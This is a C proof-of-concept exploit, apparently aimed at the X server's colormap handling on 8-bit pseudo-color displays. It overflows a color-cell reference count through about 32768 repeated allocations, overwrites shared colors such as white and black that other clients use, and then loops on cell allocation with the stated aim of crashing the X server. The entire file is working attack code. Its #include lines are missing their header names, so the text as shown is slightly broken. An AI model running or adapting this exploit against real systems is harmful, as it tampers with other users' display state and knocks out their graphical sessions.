/* * free and overwrite target color cells using "refcnt overflow" BUG * visual : 8bit pseudo color */ #include #include int main(int argc, char **argv) { Display* disp; Colormap cmap; XColor c0, c1; unsigned long px[1]; unsigned long pl[1]; unsigned int nplanes = 0; unsigned int npixels = 1; unsigned int imax = 32768; unsigned int i; char dummy[8]; char* target[] = { "#FFFFFF", /* assume pixel #0 is white */ "#000000" /* assume pixel #1 is black */ }; char* crack[] = { "#FFC0CB", /* pixel #0 may become pink */ "#000080" /* pixel #1 may become navy */ }; /* !! try to overflow the refcnt !! */ disp = XOpenDisplay(NULL); cmap = DefaultColormap(disp, 0); XAllocNamedColor(disp, cmap, target[0], &c0, &c1); printf("Target1 : #%d (%s)\n", c0.pixel, target[0]); XAllocNamedColor(disp, cmap, target[1], &c0, &c1); printf("Target2 : #%d (%s)\n", c0.pixel, target[1]); for (i = 1; i < imax; i++) { XAllocNamedColor(disp, cmap, target[0], &c0, &c1); XAllocNamedColor(disp, cmap, target[1], &c0, &c1); printf("\r[%5d/%5d] ", i+1, imax); fflush(stdout); } printf("\n"); XCloseDisplay(disp); /* !! target shared color cells may be released now !! */ /* !! try to overwrite the RGB value !! */ disp = XOpenDisplay(NULL); cmap = DefaultColormap(disp, 0); XAllocNamedColor(disp, cmap, crack[0], &c0, &c1); printf("Overwrite #%d with %s\n", c0.pixel, crack[0]); XAllocNamedColor(disp, cmap, crack[1], &c0, &c1); printf("Overwrite #%d with %s\n", c0.pixel, crack[1]); printf("Press [Enter] to crash Xserver...\n"); fflush(stdin); fgets(dummy, sizeof(dummy), stdin); /* !! free cell counter may be broken, too !! */ for (i = 1; ; i++) { XAllocColorCells(disp, cmap, False, pl, nplanes, px ,npixels); printf("\r[%5d] ", i); fflush(stdout); } printf("\n"); XCloseDisplay(disp); return 0; }